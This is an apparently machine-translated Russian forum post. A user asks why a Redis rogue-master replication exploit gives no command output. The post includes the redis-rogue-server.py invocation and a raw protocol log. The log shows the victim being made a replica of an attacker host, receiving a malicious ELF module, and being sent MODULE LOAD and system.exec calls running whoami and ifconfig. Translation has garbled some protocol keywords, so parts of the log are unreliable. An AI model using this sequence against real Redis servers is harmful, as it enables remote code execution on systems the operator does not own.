Назад | Перейти на главную страницу

Redis Server Exploit для выполнения команд

Я новичок на этом форуме и ищу помощь, чтобы разобраться в этом эксплойте. Я пытаюсь проверить выполнение команды на уязвимом сервере Redis.

Следуя этому документу, я могу эксплуатировать сервер Redis, но не могу вводить какие-либо команды, то есть не выводить данные. Я вижу «ОК» в командной строке сервера. Все, что мне здесь не хватает, или команды должны выполняться по-другому в этой оболочке:

https://medium.com/@knownsec404team/rce-exploits-of-redis-based-on-master-slave-replication-ef7a664ce1d0

root / redis-rogue-server # python3 redis-rogue-server.py --rhost 10.10.10.11 --rport 6379 --lhost 10.10.10.10 --lport 21001

ЦЕЛЬ 10.10.10.11:6379

СЕРВЕР 10.10.10.10:21001

[<-] b '* 3 \ r \ n $ 7 \ r \ nSLAVEOF \ r \ n $ 13 \ r \ n10.10.10.10 \ r \ n $ 5 \ r \ n21001 \ r \ n'

[->] b '+ OK \ r \ n'

[<-] b '* 4 \ r \ n $ 6 \ r \ nCONFIG \ r \ n $ 3 \ r \ nSET \ r \ n $ 10 \ r \ ndb имя файла \ r \ n $ 6 \ r \ nexp.so \ r \ n '

[->] b '+ OK \ r \ n'

[->] b'PING \ r \ n '

[<-] b '+ PONG \ r \ n'

[->] b'REPLCONF прослушивающий порт 6379 \ r \ n '

[<-] b '+ OK \ r \ n'

[->] b'REPLCONF capa eof \ r \ n '

[<-] b '+ OK \ r \ n'

[->] b'PSYNC? -1 \ r \ n '

[<-] b '+ FULLRESYNC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 1 \ r \ n $ 48560 \ r \ n \ x7fELF \ x02 \ x01 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 ..b '\ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x03 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ xd9 \ xb6 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ xd3 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x01 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ x00 \ r \ n '

[<-] b '* 3 \ r \ n $ 6 \ r \ nМОДУЛЬ \ r \ n $ 4 \ r \ nЗАГРУЗИТЬ \ r \ n $ 8 \ r \ n./exp.so \ r \ n' [->] b "-ERR неизвестная команда 'МОДУЛЬ' \ r \ n"

[<-] b '* 3 \ r \ n $ 7 \ r \ nSLAVEOF \ r \ n $ 2 \ r \ nНЕТ \ r \ n $ 3 \ r \ nONE \ r \ n'

[->] b '+ OK \ r \ n'

[<<] whoami

[<-] b '* 2 \ r \ n $ 11 \ r \ nsystem.exec \ r \ n $ 6 \ r \ nwhoami \ r \ n'

[<<] ifconfig

[<-] b '* 2 \ r \ n $ 11 \ r \ nsystem.exec \ r \ n $ 8 \ r \ nifconfig \ r \ n'

[->] b "-ERR неизвестная команда 'system.exec' \ r \ n"